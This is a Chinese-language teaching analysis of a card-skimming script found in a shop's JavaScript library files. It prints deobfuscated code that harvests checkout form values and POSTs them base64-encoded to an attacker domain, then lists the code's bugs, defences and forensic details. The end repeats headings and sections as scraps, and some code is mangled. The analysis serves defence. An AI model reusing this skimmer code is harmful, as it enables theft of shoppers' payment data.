JavaScript恶意代码逆向分析教学文档<\/h1>

1. 恶意代码概述<\/h2>
这段恶意代码被发现注入在marveloptics.com网站的JavaScript库文件中，主要功能是窃取用户结账表单数据并发送到攻击者控制的服务器。<\/p>

1.1 攻击特点<\/h3>

注入位置：伪装成Modernizr和OpenID等常用库文件<\/li>
目标数据：网页表单中的输入数据（用户名、密码、支付信息等）<\/li>
数据发送目标：https:\/\/webfotce.me\/js\/form.js<\/code><\/li>

攻击者：与中国福建的"Wuxi Yilian LLC"公司有关联<\/li>
<\/ul>
2. 恶意代码注入技术<\/h2>
2.1 选择注入点<\/h3>
攻击者选择将恶意代码注入到以下类型的文件中：<\/p>

modernizr.js<\/code><\/li>
openid.js<\/code><\/li>
<\/ul>
选择这些文件的原因<\/strong>：<\/p>

这些库通常包含压缩过的代码，使混淆后的恶意代码更难被发现<\/li>
开发者很少升级这些依赖库，恶意代码可以长期存在<\/li>
这些库通常在所有页面加载，增加了攻击覆盖面<\/li>
<\/ol>
3. 代码反混淆技术<\/h2>
3.1 初始混淆状态<\/h3>
原始代码经过javascriptobfuscator.com等工具混淆，变量名被替换为无意义的字符串。<\/p>
3.2 反混淆步骤<\/h3>

使用js-beautify工具进行基础格式化：<\/li>
<\/ol>
js-beautify -x -s 2<\/span> original\/openid.js
<\/span><\/span><\/code><\/pre>
手动分析并重命名变量，还原代码可读性<\/li>
<\/ol>
4. 恶意代码功能分析<\/h2>
4.1 主要功能模块<\/h3>
4.1.1 用户标识生成<\/h4>
myid<\/span>:<\/span> (function<\/span>(cookieName<\/span>) {
<\/span><\/span>    \/\/ 检查cookie中的`setidd`字段
<\/span><\/span><\/span><\/span>    var<\/span> id<\/span> =<\/span> document.cookie<\/span>.match<\/span>(new<\/span> RegExp("( + cookieName.replace(\/(g, "<\/span>\\<\/span>$1<\/span>") + "<\/span>=<\/span> ));
<\/span><\/span>    return<\/span> id<\/span> ?<\/span> decodeURIComponent(id<\/span>[1<\/span>]) :<\/span> undefined<\/span>;
<\/span><\/span>})("setidd"<\/span>) ||<\/span> (function<\/span>() {
<\/span><\/span>    \/\/ 如果cookie不存在，生成新ID并保存到cookie
<\/span><\/span><\/span><\/span>    var<\/span> timestamp<\/span> =<\/span> new<\/span> Date();
<\/span><\/span>    var<\/span> id<\/span> =<\/span> timestamp<\/span>.getTime<\/span>() +<\/span> "-"<\/span> +<\/span> 
<\/span><\/span>             Math.floor<\/span>(Math.random<\/span>() *<\/span> (999999999<\/span> -<\/span> 11111111<\/span> +<\/span> 1<\/span>) +<\/span> 11111111<\/span>);
<\/span><\/span>    var<\/span> expiration<\/span> =<\/span> new<\/span> Date(new<\/span> Date().getTime<\/span>() +<\/span> 60<\/span> *<\/span> 60<\/span> *<\/span> 24<\/span> *<\/span> 1000<\/span>);
<\/span><\/span>    document.cookie<\/span> =<\/span> "setidd="<\/span> +<\/span> id<\/span> +<\/span> "; path=\/; expires="<\/span> +<\/span> expiration<\/span>.toUTCString<\/span>();
<\/span><\/span>    return<\/span> id<\/span>;
<\/span><\/span>})()
<\/span><\/span><\/code><\/pre>功能<\/strong>：<\/p>

检查cookie中是否存在"setidd"字段<\/li>
如果不存在，生成唯一ID并存储在cookie中<\/li>
ID格式：[时间戳]-[随机数]<\/code>（如1529853014535-289383517<\/code>）<\/li>
cookie有效期为24小时<\/li>
<\/ul>
4.1.2 数据窃取功能<\/h4>
stealData<\/span>:<\/span> function<\/span>() {
<\/span><\/span>    Malware<\/span>.data<\/span> =<\/span> null<\/span>;
<\/span><\/span>    var<\/span> elements<\/span> =<\/span> document.querySelectorAll<\/span>("input, select, textarea, checkbox, button"<\/span>);
<\/span><\/span>    for<\/span> (var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> elements<\/span>.length<\/span>; i<\/span>++<\/span>) {
<\/span><\/span>        if<\/span> (elements<\/span>[i<\/span>].value<\/span>.length<\/span> ><\/span> 0<\/span>) {
<\/span><\/span>            var<\/span> name<\/span> =<\/span> elements<\/span>[i<\/span>].name<\/span>;
<\/span><\/span>            if<\/span> (name<\/span> ==<\/span> ""<\/span>) { name<\/span> =<\/span> i<\/span> };
<\/span><\/span>            Malware<\/span>.data<\/span> +=<\/span> elements<\/span>[i<\/span>].name<\/span> +<\/span> "="<\/span> +<\/span> elements<\/span>[i<\/span>].value<\/span> +<\/span> "&"<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>功能<\/strong>：<\/p>

收集页面中所有input、select、textarea、checkbox和button元素的值<\/li>
格式化为name=value<\/code>形式并用&<\/code>连接<\/li>
存在bug：初始时data<\/code>为null，拼接字符串会产生nullname=value&...<\/code><\/li>
<\/ul>
4.1.3 事件监听设置<\/h4>
\/\/ 为按钮添加点击事件监听
<\/span><\/span><\/span><\/span>var<\/span> elements<\/span> =<\/span> document.querySelectorAll<\/span>("a[href*='javascript:void(0)'],button, input, submit, .btn, .button"<\/span>);
<\/span><\/span>for<\/span> (var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> elements<\/span>.length<\/span>; i<\/span>++<\/span>) {
<\/span><\/span>    var<\/span> element<\/span> =<\/span> elements<\/span>[i<\/span>];
<\/span><\/span>    if<\/span> (element<\/span>.type<\/span> !=<\/span> "text"<\/span> &&<\/span> element<\/span>.type<\/span> !=<\/span> "select"<\/span> &&<\/span> 
<\/span><\/span>        element<\/span>.type<\/span> !=<\/span> "checkbox"<\/span> &&<\/span> element<\/span>.type<\/span> !=<\/span> "password"<\/span> &&<\/span> 
<\/span><\/span>        element<\/span>.type<\/span> !=<\/span> "radio"<\/span>) {
<\/span><\/span>        if<\/span> (element<\/span>.addEventListener<\/span>) {
<\/span><\/span>            element<\/span>.addEventListener<\/span>("click"<\/span>, Malware<\/span>.stealData<\/span>, false<\/span>);
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            element<\/span>.attachEvent<\/span>("onclick"<\/span>, Malware<\/span>.stealData<\/span>);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>\/\/ 为表单添加提交事件监听（存在bug）
<\/span><\/span><\/span><\/span>var<\/span> formElements<\/span> =<\/span> document.querySelectorAll<\/span>("form"<\/span>);
<\/span><\/span>for<\/span> (vari<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> formElements<\/span>.length<\/span>; i<\/span>++<\/span>) {
<\/span><\/span>    if<\/span> (formElements<\/span>[i<\/span>].addEventListener<\/span>) {
<\/span><\/span>        formElements<\/span>[i<\/span>].addEventListener<\/span>("submit"<\/span>, Malware<\/span>.stealData<\/span>, false<\/span>);
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        formElements<\/span>[i<\/span>].attachEvent<\/span>("onsubmit"<\/span>, Malware<\/span>.stealData<\/span>);
<\/span><\/span>    }
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>功能<\/strong>：<\/p>

为页面中所有按钮和可点击元素添加点击事件监听，触发时执行数据收集<\/li>
为所有表单添加提交事件监听<\/li>
存在bug：vari<\/code>拼写错误导致表单提交监听可能不工作<\/li>
<\/ul>
4.1.4 数据发送功能<\/h4>
if<\/span> (Malware<\/span>.data<\/span> !=<\/span> null<\/span>) {
<\/span><\/span>    var<\/span> hostname<\/span> =<\/span> location<\/span>.hostname<\/span>.split<\/span>("."<\/span>).slice<\/span>(0<\/span>).join<\/span>("_"<\/span>) ||<\/span> "nodomain"<\/span>;
<\/span><\/span>    var<\/span> data<\/span> =<\/span> btoa<\/span>(Malware<\/span>.data<\/span>); \/\/ base64编码
<\/span><\/span><\/span><\/span>    var<\/span> xhr<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>();
<\/span><\/span>    xhr<\/span>.open<\/span>("POST"<\/span>, Malware<\/span>.url<\/span>, true<\/span>);
<\/span><\/span>    xhr<\/span>.setRequestHeader<\/span>("Content-type"<\/span>, "application\/x-www-form-urlencoded"<\/span>);
<\/span><\/span>    xhr<\/span>.send<\/span>("info="<\/span> +<\/span> data<\/span> +<\/span> "&hostname="<\/span> +<\/span> hostname<\/span> +<\/span> "&key="<\/span> +<\/span> Malware<\/span>.myid<\/span>);
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>功能<\/strong>：<\/p>

将收集的数据进行base64编码<\/li>
通过POST请求发送到攻击者服务器<\/li>
包含主机名（点替换为下划线）和用户ID<\/li>
每30毫秒尝试发送一次数据<\/li>
<\/ul>
4.2 执行入口<\/h3>
if<\/span> ((new<\/span> RegExp("onepage|checkout|onestep"<\/span>, "gi"<\/span>)).test<\/span>(window.location<\/span>)) {
<\/span><\/span>    Malware<\/span>.send<\/span>();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>触发条件<\/strong>：<\/p>

只在URL包含"onepage"、"checkout"或"onestep"的页面执行<\/li>
主要针对结账页面<\/li>
<\/ul>
5. 攻击技术分析<\/h2>
5.1 持久性技术<\/h3>

使用cookie存储用户ID，24小时有效期内可识别同一用户<\/li>
注入到常用库文件中，长期存在不被发现<\/li>
<\/ul>
5.2 数据收集技术<\/h3>

广泛收集各种表单元素数据<\/li>
包含输入框、下拉菜单、复选框等多种表单元素<\/li>
<\/ul>
5.3 数据外传技术<\/h3>

使用XMLHttpRequest发送数据<\/li>
数据经过base64编码<\/li>
发送到第三方域名webfotce.me<\/code><\/li>
<\/ul>
5.4 规避检测技术<\/h3>

代码混淆增加分析难度<\/li>
只在特定页面触发减少暴露风险<\/li>
使用HTTPS协议传输数据<\/li>
<\/ul>
6. 代码中的缺陷<\/h2>
6.1 编程错误<\/h3>


字符串拼接时未初始化变量：<\/p>
Malware<\/span>.data<\/span> =<\/span> null<\/span>;
<\/span><\/span>Malware<\/span>.data<\/span> +=<\/span> elements<\/span>[i<\/span>].name<\/span> +<\/span> "="<\/span> +<\/span> elements<\/span>[i<\/span>].value<\/span> +<\/span> "&"<\/span>;
<\/span><\/span><\/code><\/pre>结果会产生nullname=value&...<\/code><\/p>
<\/li>

变量名拼写错误：<\/p>
for<\/span> (vari<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> formElements<\/span>.length<\/span>; i<\/span>++<\/span>)
<\/span><\/span><\/code><\/pre>应该是var i = 0<\/code><\/p>
<\/li>
<\/ol>
6.2 逻辑问题<\/h3>

每30毫秒执行一次send()，性能影响大<\/li>
表单提交事件监听可能不工作<\/li>
<\/ul>
7. 防御措施<\/h2>
7.1 网站管理员防护<\/h3>

定期检查第三方库文件的完整性<\/li>
使用Subresource Integrity (SRI)确保加载的脚本未被篡改<\/li>
实施内容安全策略(CSP)限制外部连接<\/li>
定期更新所有依赖库<\/li>
<\/ol>
7.2 开发者防护<\/h3>

使用代码签名验证脚本来源<\/li>
监控异常的网络请求<\/li>
实现输入验证和输出编码<\/li>
<\/ol>
7.3 用户防护<\/h3>

使用广告拦截器\/隐私保护扩展<\/li>
启用浏览器安全功能<\/li>
注意浏览器警告提示<\/li>
<\/ol>
8. 取证信息<\/h2>
8.1 攻击者信息<\/h3>

域名：webfotce.me<\/code><\/li>
注册商：Bizcn.com<\/li>
注册公司：中国福建"Wuxi Yilian LLC"<\/li>
创建时间：2016-10-28<\/li>
<\/ul>
8.2 攻击时间线<\/h3>

marveloptics.com在2017年1月至6月期间被感染<\/li>
至少持续了一年时间窃取客户信息<\/li>
<\/ul>
9. 总结<\/h2>
这段恶意代码展示了常见的表单劫持技术，虽然代码质量不高但足以造成危害。攻击者通过注入常用库文件实现长期潜伏，专门针对结账页面窃取敏感信息。防御此类攻击需要多层防护措施，包括代码完整性检查、网络请求监控和严格的内容安全策略。<\/p>

JavaScript恶意代码逆向分析教学文档<\/h1>

1. 恶意代码概述<\/h2> 这段恶意代码被发现注入在marveloptics.com网站的JavaScript库文件中，主要功能是窃取用户结账表单数据并发送到攻击者控制的服务器。<\/p>

2. 恶意代码注入技术<\/h2>

3. 代码反混淆技术<\/h2>

3.1 初始混淆状态<\/h3> 原始代码经过javascriptobfuscator.com等工具混淆，变量名被替换为无意义的字符串。<\/p>

4. 恶意代码功能分析<\/h2>

4.1 主要功能模块<\/h3>

5. 攻击技术分析<\/h2>

6. 代码中的缺陷<\/h2>

7. 防御措施<\/h2>

8. 取证信息<\/h2>

1. 恶意代码概述<\/h2>
这段恶意代码被发现注入在marveloptics.com网站的JavaScript库文件中，主要功能是窃取用户结账表单数据并发送到攻击者控制的服务器。<\/p>

3.1 初始混淆状态<\/h3>
原始代码经过javascriptobfuscator.com等工具混淆，变量名被替换为无意义的字符串。<\/p>